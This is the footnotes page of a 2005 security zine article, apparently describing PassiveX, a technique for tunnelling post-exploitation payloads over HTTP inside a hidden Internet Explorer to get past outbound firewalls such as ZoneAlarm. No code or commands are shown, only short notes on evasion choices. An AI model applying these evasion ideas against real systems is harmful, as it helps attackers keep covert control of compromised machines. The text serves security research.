Uninformed - vol 1 article 3

Informative Information for the Uninformed

Current

All

About

Vol 1» 2005.May

... interpreter ^2.1

There are other classes of post-exploitation payloads but these two are the most prominent. findsock style payloads are excluded from this discussion due to the fact that they are vulnerability dependent and as such not as universal as the two commonly used payloads.

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

... succeeded ^2.2

In some cases it is possible to rebind to the port of the service being exploited. This fact is outside of the scope of this document.

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

... action ^2.3

An example of this comes in the form of ZoneAlarm's outbound filter that prompts the user when an application attempts to make a connection to determine whether or not the connection should be allowed.

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

... filters ^2.4

The second most likely, in the author's opinion, is DNS.

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

... traffic ^3.1

It is possible to make use of technology like chunked encoding, however, such technology is seen as easier to flag and detect as malicious traffic from the perspective of an outbound filter and cannot always be relied upon to work when passing through HTTP proxies.

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

... fashion ^3.2

Which, as fate would have it, just so happens to align well with this paper's intention of creating an HTTP tunnel in the context of a trusted process.

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

... manually ^3.3

The control would have to be able to be registered under the user-specific classes key instead of the global classes key in order to avoid permission problems.

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

... PassiveX ^3.4

Though PassiveX has been used for other projects, it seemed only fitting to use for this one as well.

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

... same ^3.5

This code has potential issues with certain locales depending on whether or not assumptions made about code paths or ASCII drive letters are safe.

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

... Library)^3.6

The reason that ATL was picked over MFC was due to the fact that MFC is less portable without CAB'ing dependencies (as when dynamically linked against the MFC DLLs), or much larger (as when statically linked against the MFC libs).

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

... interface ^3.7

This was tested with Zone Alarm 5.5.062.011.

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

... Explorer ^3.8

Reference code can be found in the Metaploit Framework.

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

... settings ^3.9

The API also allows the programmer to explicitly ignore the pre-cached settings if so desired.

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

... functional ^5.1

There have been rumors of decisions to make it impossible to execute a hidden Internet Explorer, though no concrete information has been posted at the time of this writing.

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

... program ^5.2

Most firewall products for NT-based versions of Windows are implemented as NDIS intermediate drivers since such drivers provide the lowest level of supported filtering.

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.